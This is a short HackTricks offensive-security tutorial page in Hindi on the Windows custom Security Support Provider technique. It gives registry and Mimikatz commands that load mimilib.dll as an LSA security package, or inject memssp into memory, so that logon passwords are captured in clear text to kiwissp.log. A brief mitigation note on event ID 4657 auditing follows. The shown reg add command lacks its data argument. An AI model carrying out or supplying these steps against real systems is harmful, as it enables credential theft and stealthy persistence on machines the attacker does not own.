Custom SSP

Reading time: 2 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

Custom SSP

यहाँ जानें कि SSP (सिक्योरिटी सपोर्ट प्रोवाइडर) क्या है।
आप अपना खुद का SSP बना सकते हैं ताकि मशीन तक पहुँचने के लिए उपयोग किए गए क्रेडेंशियल्स को स्पष्ट पाठ में कैप्चर कर सकें।

Mimilib

आप Mimikatz द्वारा प्रदान किए गए mimilib.dll बाइनरी का उपयोग कर सकते हैं। यह सभी क्रेडेंशियल्स को स्पष्ट पाठ में एक फ़ाइल के अंदर लॉग करेगा।
dll को C:\Windows\System32\ में डालें
मौजूदा LSA सुरक्षा पैकेजों की सूची प्राप्त करें:

attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll को सुरक्षा समर्थन प्रदाता सूची (सुरक्षा पैकेज) में जोड़ें:

powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

और एक रिबूट के बाद सभी क्रेडेंशियल्स C:\Windows\System32\kiwissp.log में स्पष्ट पाठ में पाए जा सकते हैं।

मेमोरी में

आप इसे सीधे मेमोरी में Mimikatz का उपयोग करके भी इंजेक्ट कर सकते हैं (ध्यान दें कि यह थोड़ा अस्थिर/काम नहीं कर सकता है):

powershell
privilege::debug
misc::memssp

यह रिबूट को सहन नहीं करेगा।

शमन

इवेंट आईडी 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages का ऑडिट निर्माण/परिवर्तन

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें